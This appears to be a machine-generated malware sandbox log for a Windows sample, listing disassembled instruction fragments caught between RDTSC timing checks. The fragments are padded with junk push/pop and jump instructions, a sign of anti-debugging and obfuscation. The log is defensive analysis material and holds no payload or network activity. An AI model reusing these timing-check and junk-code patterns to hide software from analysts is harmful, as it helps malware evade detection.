                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF631 second address: 9BF63B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF63B second address: 9BF645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FAAC5092E56h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF645 second address: 9BF66F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5254A92h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b pushad 0x0000000c jng 00007FAAC5254A86h 0x00000012 push edi 0x00000013 pop edi 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push edi 0x0000001a pop edi 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C2810 second address: 9C2819 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C2819 second address: 9C2835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAC5254A96h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C2835 second address: 9C285A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FAAC5092E68h 0x0000000a jnc 00007FAAC5092E62h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C285A second address: 9C2860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C29BE second address: 9C29C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C29C4 second address: 9C29D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jnc 00007FAAC5254A86h 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C29D4 second address: 9C29DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FAAC5092E56h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C29DF second address: 9C29E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C2B00 second address: 9C2B05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C2B05 second address: 9C2B0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90B9FE second address: 90BA1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAC5092E62h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90BA1B second address: 90BA1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C2FFE second address: 9C302C instructions: 0x00000000 rdtsc 0x00000002 jng 00007FAAC5092E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAAC5092E5Ah 0x00000011 jmp 00007FAAC5092E68h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C302C second address: 9C3048 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5254A98h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C3182 second address: 9C3187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C3187 second address: 9C318D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C318D second address: 9C31BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAAC5092E63h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C31BE second address: 9C31C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C31C2 second address: 9C31CF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C31CF second address: 9C31D9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C31D9 second address: 9C31DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C31DF second address: 9C31E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C31E3 second address: 9C31E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C31E7 second address: 9C3207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FAAC5254A98h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C3207 second address: 9C320B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C3382 second address: 9C3392 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jc 00007FAAC5254A86h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CAFEF second address: 9CB015 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAC5092E65h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jne 00007FAAC5092E56h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CB015 second address: 9CB02C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007FAAC5254A8Eh 0x0000000f jng 00007FAAC5254A86h 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CB1BD second address: 9CB1C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CB1C3 second address: 9CB1C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CB1C7 second address: 9CB1D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CB1D0 second address: 9CB1DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jne 00007FAAC5254A86h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CB305 second address: 9CB32D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E66h 0x00000007 jnp 00007FAAC5092E56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jns 00007FAAC5092E58h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CBA7A second address: 9CBA83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D25F6 second address: 9D2610 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FAAC5092E56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAAC5092E5Eh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D2610 second address: 9D2618 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D2618 second address: 9D2641 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E64h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FAAC5092E5Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D2641 second address: 9D2657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jp 00007FAAC5254A94h 0x0000000d pushad 0x0000000e jng 00007FAAC5254A86h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D21E7 second address: 9D21F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D21F1 second address: 9D21F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D233B second address: 9D233F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D233F second address: 9D234F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5254A8Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DCF70 second address: 9DCF76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DCF76 second address: 9DCFA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FAAC5254A8Eh 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push esi 0x00000013 pop esi 0x00000014 jnp 00007FAAC5254A86h 0x0000001a popad 0x0000001b jmp 00007FAAC5254A8Ch 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DCFA6 second address: 9DCFB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E5Bh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DCFB8 second address: 9DCFBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E04E4 second address: 9E04E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E2DDA second address: 9E2DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FAAC5254A8Dh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E6B63 second address: 9E6B67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9E6B67 second address: 9E6B6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F4ACA second address: 9F4ACE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F4ACE second address: 9F4ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FAAC5254A86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F4ADA second address: 9F4ADF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F6E02 second address: 9F6E07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9F8578 second address: 9F8586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jl 00007FAAC5092E56h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FAA11 second address: 9FAA15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9FFC74 second address: 9FFC79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A000A0 second address: A000A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A000A4 second address: A000AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A000AA second address: A000C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAC5254A94h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A000C2 second address: A000F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jne 00007FAAC5092E56h 0x00000012 push eax 0x00000013 pop eax 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push ecx 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c pop ecx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A000F2 second address: A0012D instructions: 0x00000000 rdtsc 0x00000002 jno 00007FAAC5254AA3h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FAAC5254A94h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A003FB second address: A003FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A003FF second address: A00418 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jo 00007FAAC5254A86h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f popad 0x00000010 pushad 0x00000011 ja 00007FAAC5254A86h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A00552 second address: A00564 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FAAC5092E5Ch 0x0000000c jnl 00007FAAC5092E56h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A00564 second address: A00569 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A00569 second address: A0056F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A006CF second address: A006D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A006D3 second address: A006E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5092E5Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A006E3 second address: A006E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A04CBA second address: A04CBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A04CBE second address: A04CED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FAAC5254A92h 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FAAC5254A94h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A04CED second address: A04CF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A12D44 second address: A12D76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAC5254A8Eh 0x00000007 jmp 00007FAAC5254A97h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f jg 00007FAAC5254A86h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A12C08 second address: A12C0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0D32E second address: A0D339 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FAAC5254A86h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0D339 second address: A0D33F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1FD44 second address: A1FD4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1FD4A second address: A1FD67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FAAC5092E68h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1FD67 second address: A1FD6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A1FD6D second address: A1FD71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2FACF second address: A2FAD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2FAD5 second address: A2FADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A2FADB second address: A2FAEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAC5254A8Eh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A302A8 second address: A302AE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A302AE second address: A302E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnp 00007FAAC5254A86h 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e jmp 00007FAAC5254A94h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 jc 00007FAAC5254AA0h 0x0000001b push eax 0x0000001c push edx 0x0000001d jo 00007FAAC5254A86h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A308F7 second address: A308FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A321B4 second address: A321CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAC5254A92h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A321CF second address: A321D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A321D3 second address: A321DF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jnp 00007FAAC5254A86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A37E94 second address: A37EAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAC5092E62h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A37EAA second address: A37F40 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FAAC5254A86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007FAAC5254A88h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 push 00000004h 0x00000029 push 00000000h 0x0000002b push ecx 0x0000002c call 00007FAAC5254A88h 0x00000031 pop ecx 0x00000032 mov dword ptr [esp+04h], ecx 0x00000036 add dword ptr [esp+04h], 00000014h 0x0000003e inc ecx 0x0000003f push ecx 0x00000040 ret 0x00000041 pop ecx 0x00000042 ret 0x00000043 jmp 00007FAAC5254A8Ah 0x00000048 call 00007FAAC5254A89h 0x0000004d push eax 0x0000004e jnc 00007FAAC5254A8Ch 0x00000054 pop eax 0x00000055 push eax 0x00000056 jnc 00007FAAC5254A92h 0x0000005c mov eax, dword ptr [esp+04h] 0x00000060 push ecx 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007FAAC5254A8Eh 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A38188 second address: A381B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 and edx, 4645EC73h 0x0000000f push dword ptr [ebp+122D1DEBh] 0x00000015 mov dh, 30h 0x00000017 call 00007FAAC5092E59h 0x0000001c jng 00007FAAC5092E68h 0x00000022 push eax 0x00000023 push edx 0x00000024 jnl 00007FAAC5092E56h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A381B6 second address: A381BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A381BA second address: A381D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FAAC5092E5Fh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A381D2 second address: A381D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
